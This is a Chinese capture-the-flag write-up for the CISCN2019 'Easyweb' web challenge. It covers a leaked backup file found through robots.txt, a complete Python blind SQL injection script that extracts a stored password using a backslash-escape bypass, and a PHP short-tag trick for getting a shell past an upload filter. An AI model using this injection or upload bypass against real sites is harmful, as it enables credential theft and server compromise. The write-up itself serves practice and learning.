刷题记录:[CISCN2019 总决赛 Day2 Web1]Easyweb
[TOC]php
刷题记录:[CISCN2019 总决赛 Day2 Web1]Easyweb
题目复现连接:https://buuoj.cn/challenges 参考连接:BUUCTF的wp(随时弃坑) node
1、涉及知识点
一、敏感文件泄露
访问robots.txt能够获得image.php.bakgit
二、绕过及sql注入
贴上脚本github
import requests
url = r'http://6873d13e-5f19-42e4-bb8f-dec6d9acdeb3.node1.buuoj.cn/image.php'
result = ''
for x in range(0, 100):
high = 127
low = 32
mid = (low + high) // 2
while high > low:
payload = " or id=if(ascii(substr((select password from users limit 1 offset 0),%d,1))>%d,1,0)#" % (x, mid)
params = {
'id':'\\\\0',
'path':payload
}
response = requests.get(url, params=params)
if b'JFIF' in response.content:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
result += chr(int(mid))
print(result)
三、文件上传:短标签绕过php过滤
PHP开启短标签即short_open_tag=on时,能够使用<?=$_?>输出变量web
相关文章
- 1. 刷题记录:[CISCN2019 华北赛区 Day2 Web1]Hack World
- 2. [CISCN2019 总决赛 Day2 Web1]Easyweb && [GXYCTF2019]禁止套娃
- 3. leetcode刷题记录-day2
- 4. BUUCTF | [CISCN2019 华北赛区 Day2 Web1]Hack World
- 5. BUUOJ 刷题记录(二)
- 6. leetcode 刷题记录
- 7. [CISCN2019 东北赛区 Day2 Web3]Point System CBC字节翻转攻击
- 8. BUUOJ 刷题记录(一)
- 9. 刷题记录
- 10. [CISCN2019 华东南赛区]Web11
- 更多相关文章...
- • ADO 添加记录 - ADO 教程
- • ADO 更新记录 - ADO 教程
- • Tomcat学习笔记(史上最全tomcat学习笔记)
- • PHP Ajax 跨域问题最佳解决方案
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
相关文章
- 1. 刷题记录:[CISCN2019 华北赛区 Day2 Web1]Hack World
- 2. [CISCN2019 总决赛 Day2 Web1]Easyweb && [GXYCTF2019]禁止套娃
- 3. leetcode刷题记录-day2
- 4. BUUCTF | [CISCN2019 华北赛区 Day2 Web1]Hack World
- 5. BUUOJ 刷题记录(二)
- 6. leetcode 刷题记录
- 7. [CISCN2019 东北赛区 Day2 Web3]Point System CBC字节翻转攻击
- 8. BUUOJ 刷题记录(一)
- 9. 刷题记录
- 10. [CISCN2019 华东南赛区]Web11